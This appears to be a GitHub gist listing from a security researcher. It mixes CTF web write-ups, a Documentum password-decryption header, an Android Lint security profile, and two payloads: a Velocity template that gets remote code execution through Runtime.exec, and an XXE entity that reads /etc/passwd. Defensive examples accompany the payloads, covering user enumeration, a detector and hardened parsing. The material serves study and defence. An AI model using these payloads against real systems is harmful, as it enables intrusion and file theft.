
@h3xstream
h3xstream / bh2014_nike.py
Created August 11, 2014 20:42
Black Hat 2014: Nike T-shirt
from binascii import unhexlify

# The 8-bit groups printed on the shirt: drop the spaces and parse the whole string as base 2
data = int('0b01001010 01110101 01110011 01110100 00100000 01000100 01101111 00100000 01001001 01110100'.replace(" ", ""), 2)
# Render the integer as hex, then as raw bytes (assumes the first byte is >= 0x10, otherwise "%x" drops a leading zero and the hex string has odd length)
print(unhexlify("%x" % data))  # Python 3: print is a function
@h3xstream
h3xstream / web300.md
Last active August 13, 2018 08:34
GoSecure CTF - Web 300 pts writeup

Starting at the URL http://web300.gosec.net:6473/, we can see a page serving a static image, /troll.jpg. No special parameter can be found, and the image is confirmed to be static. Some steganography tests were run on the image, but nothing of note was observed.

(screenshot: troll page)

Hidden admin page

We scanned the host for hidden files and directories with tachyon, which found /admin.php.

(screenshot: login page)

@h3xstream
h3xstream / web200.md
Last active November 8, 2023 20:48
GoSecure CTF - Web 200 pts writeup

Starting at the URL http://web200.gosec.net:7721, we can see a login page for a dating site.

(screenshot: login page)

Small oracle

The user admin can be confirmed to exist because the login form returns two distinct error messages, one for an unknown username and another for a wrong password.

Invalid user:

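The oracle described above is a username-enumeration bug: the server answers differently depending on which check failed. The following is an added example, not the CTF's backend or the gist author's code, showing the vulnerable login shape beside a hardened one, plus the attacker-side check that turns the message difference into a list of valid accounts. The user store, salt, passwords and message strings are all constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed demo user store (not the CTF's real backend): one account,
# password stored as a salted PBKDF2-SHA256 hash. Fixed salt and a low
# iteration count keep the demo fast; use per-user salts in production.
_SALT = b"demo-salt-not-for-production"
_ITERATIONS = 10_000


def _hash_password(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


USERS = {"admin": _hash_password("correct horse battery staple")}

# Hash of a throwaway password, compared against when the username is unknown,
# so that known and unknown usernames cost the same amount of work (no timing oracle).
_DUMMY_HASH = _hash_password("placeholder")


def login_vulnerable(username: str, password: str) -> str:
    """Leaks account existence: the error text differs by failure cause."""
    if username not in USERS:
        return "Invalid user"
    if not hmac.compare_digest(USERS[username], _hash_password(password)):
        return "Invalid password"
    return "Welcome"


def login_hardened(username: str, password: str) -> str:
    """Same message and same amount of work whether or not the username exists."""
    stored = USERS.get(username, _DUMMY_HASH)
    password_ok = hmac.compare_digest(stored, _hash_password(password))
    if username in USERS and password_ok:
        return "Welcome"
    return "Invalid username or password"


def enumerate_users(login, candidates):
    """Attacker side: compare each candidate's response to the response for a
    random username that certainly does not exist; any difference confirms
    the candidate account exists."""
    baseline = login(secrets.token_hex(8), "x")
    return [user for user in candidates if login(user, "x") != baseline]


if __name__ == "__main__":
    wordlist = ["alice", "admin", "bob"]
    print("vulnerable:", enumerate_users(login_vulnerable, wordlist))
    print("hardened:  ", enumerate_users(login_hardened, wordlist))
```

Against `login_vulnerable` the enumeration returns `["admin"]`; against `login_hardened` it returns nothing, because the only way to get a different answer is to guess the right password. In a real deployment the generic message must be paired with the dummy-hash trick shown here (otherwise response time becomes the oracle) and with rate limiting on the login endpoint.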
@h3xstream
h3xstream / RecoverPW.java
Last active March 14, 2021 15:52
Decrypt Documentum database passwords.
/*
* (C) 2012 MSRoth - msroth.wordpress.com
*
* recoverPW v2
*
* This code will decrypt BOF and database passwords. It will *NOT* decrypt
* inline user passwords.
*
* From the D6.5 EMC Documentum Content Server Administration Guide, p. 353:
* "Passwords encrypted with encryptPassword cannot be decrypted explicitly
@h3xstream
h3xstream / Android_Security.xml
Created June 29, 2015 18:07
Security profile for Android Lint (for Security Audit)
<?xml version="1.0" encoding="UTF-8"?>
<inspections version="1.0" is_locked="false">
<option name="myName" value="Android Lint - Security only checks" />
<option name="myLocal" value="false" />
<inspection_tool class="AccessStaticViaInstance" enabled="false" level="WARNING" enabled_by_default="false" />
<inspection_tool class="AndroidDomInspection" enabled="false" level="ERROR" enabled_by_default="false" />
<inspection_tool class="AndroidElementNotAllowed" enabled="false" level="WARNING" enabled_by_default="false" />
<inspection_tool class="AndroidLintAaptCrash" enabled="false" level="ERROR" enabled_by_default="false" />
<inspection_tool class="AndroidLintAccidentalOctal" enabled="false" level="ERROR" enabled_by_default="false" />
<inspection_tool class="AndroidLintAdapterViewChildren" enabled="false" level="WARNING" enabled_by_default="false" />
@h3xstream
h3xstream / >> output result
Last active September 3, 2015 20:27
Type erasure
> javac *.java
> javap -c StringBuilderProcessor
Compiled from "StringBuilderProcessor.java"
public class StringBuilderProcessor implements GenericProcessor<java.lang.StringBuilder> {
public StringBuilderProcessor();
Code:
0: aload_0
1: invokespecial #1 // Method java/lang/Object."<init>":()V
4: return
@h3xstream
h3xstream / liens.md
Last active August 7, 2017 18:05
GoSecure - PFE (final-year project): static analysis
@h3xstream
h3xstream / rce.vm
Last active June 6, 2017 03:00
RCE in a Velocity template when no extensions are enabled
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('ls'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
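The template above needs no custom tools or extensions: Velocity's default uberspector lets `$x.class` reach `java.lang.Class` from any String in the context, and `forName` plus `Runtime.getRuntime().exec` does the rest. The following added example (not part of the gist) is a small Python checker that flags this reflective chain in user-supplied templates before they are rendered; it runs over the gist's payload and over a constructed benign template. The pattern list is this example's own heuristic, not an official Velocity denylist.

```python
import re

# Reflection and process-execution sinks reachable from a String in the
# context through the .class property chain. Heuristic list (assumption of
# this example), not an exhaustive or official Velocity denylist.
SINK_PATTERNS = {
    "class-introspection": re.compile(r"\.class\b"),
    "Class.forName": re.compile(r"\bforName\s*\("),
    "Runtime": re.compile(r"\bgetRuntime\s*\("),
    "exec": re.compile(r"\.exec\s*\("),
    "ProcessBuilder": re.compile(r"\bProcessBuilder\b"),
    "ClassLoader": re.compile(r"\bgetClassLoader\s*\("),
}

# The gist's rce.vm, embedded here as sample input.
RCE_TEMPLATE = """#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('ls'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
"""

# Constructed benign template: ordinary property and method access only.
BENIGN_TEMPLATE = """#set($greeting='Hello')##
$greeting, $user.name! You have $cart.size() items in your cart.
"""


def find_reflection_sinks(template: str) -> list[tuple[int, str]]:
    """Return (line_number, sink_name) for every suspicious reference,
    in source order, so a reviewer can jump straight to the offending line."""
    hits = []
    for lineno, line in enumerate(template.splitlines(), start=1):
        for name, pattern in SINK_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


def is_template_suspicious(template: str) -> bool:
    return bool(find_reflection_sinks(template))


if __name__ == "__main__":
    for lineno, name in find_reflection_sinks(RCE_TEMPLATE):
        print(f"line {lineno}: {name}")
    print("benign template suspicious:", is_template_suspicious(BENIGN_TEMPLATE))
```

A text scan like this is a detection aid, not the fix: it can be bypassed by building method names at runtime. The fix on the Velocity side is to configure `runtime.introspector.uberspect = org.apache.velocity.util.introspection.SecureUberspector`, which blocks `getClass`/`getClassLoader` and similar reflective calls from templates, and to never render templates authored by untrusted users at all when that is an option.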
@h3xstream
h3xstream / etc-passwd
Last active October 27, 2018 15:00
44con
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<feed>
<title>test</title>
<description>test</description>
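The entity declaration above is the classic XXE setup; the preview is cut off before the point where `&xxe;` is referenced. As an added example that is not the gist's code, here is a Python `xml.parsers.expat` parser in two shapes: one that resolves external entities, which is exactly the behaviour the payload relies on, and one that rejects any DOCTYPE before a single entity can be declared. To run offline and never touch the real /etc/passwd, the resolver reads from a constructed in-memory "filesystem"; the payload variant with `&xxe;` inside `<title>`, the fake file contents and the function names are all assumptions of this example.

```python
import xml.parsers.expat as expat

# Constructed variant of the gist's payload with the entity actually
# referenced inside <title>; the gist preview is cut off before that point.
XXE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<feed>
<title>&xxe;</title>
<description>test</description>
</feed>"""

BENIGN_FEED = b"""<?xml version="1.0" encoding="UTF-8"?>
<feed><title>test</title><description>test</description></feed>"""

# Constructed stand-in for the server's filesystem so the demo runs offline.
FAKE_FS = {"file:///etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n"}


class DoctypeRejected(ValueError):
    pass


def _collect_fields(parser):
    """Attach handlers that gather {element: text} while parsing."""
    fields, stack = {}, []

    def start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def end(name):
        stack.pop()

    def chars(text):
        if stack:
            fields[stack[-1]] += text

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    return fields


def parse_feed_unsafe(data: bytes, fs=FAKE_FS) -> dict:
    """Vulnerable shape: external entities are fetched and inlined, so the
    attacker's file ends up in the <title> field the application displays."""
    parser = expat.ParserCreate()
    fields = _collect_fields(parser)

    def resolve(context, base, system_id, public_id):
        content = fs.get(system_id)
        if content is None:
            return 0  # expat turns this into a parse error
        child = parser.ExternalEntityParserCreate(context)  # inherits the handlers
        child.Parse(content, True)
        return 1

    parser.ExternalEntityRefHandler = resolve
    parser.Parse(data, True)
    return fields


def parse_feed(data: bytes) -> dict:
    """Hardened shape: refuse any DOCTYPE, so no entity can be declared at all."""
    parser = expat.ParserCreate()
    fields = _collect_fields(parser)

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE '{name}' rejected: DTDs are not accepted")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(data, True)
    return fields


def rejects_doctype(data: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_feed(data)
    except DoctypeRejected:
        return True
    return False


if __name__ == "__main__":
    print("unsafe title:", repr(parse_feed_unsafe(XXE_PAYLOAD)["title"]))
    print("hardened rejects payload:", rejects_doctype(XXE_PAYLOAD))
    print("hardened benign title:", parse_feed(BENIGN_FEED)["title"])
```

Rejecting the DOCTYPE outright is the simplest robust defence: it also shuts down billion-laughs entity expansion and parameter-entity tricks, not only file reads. If an application legitimately needs DTDs, the fallback is to leave `ExternalEntityRefHandler` unset or return 0 from it and to keep parameter-entity parsing disabled, but that has to be checked per parser library, since defaults differ.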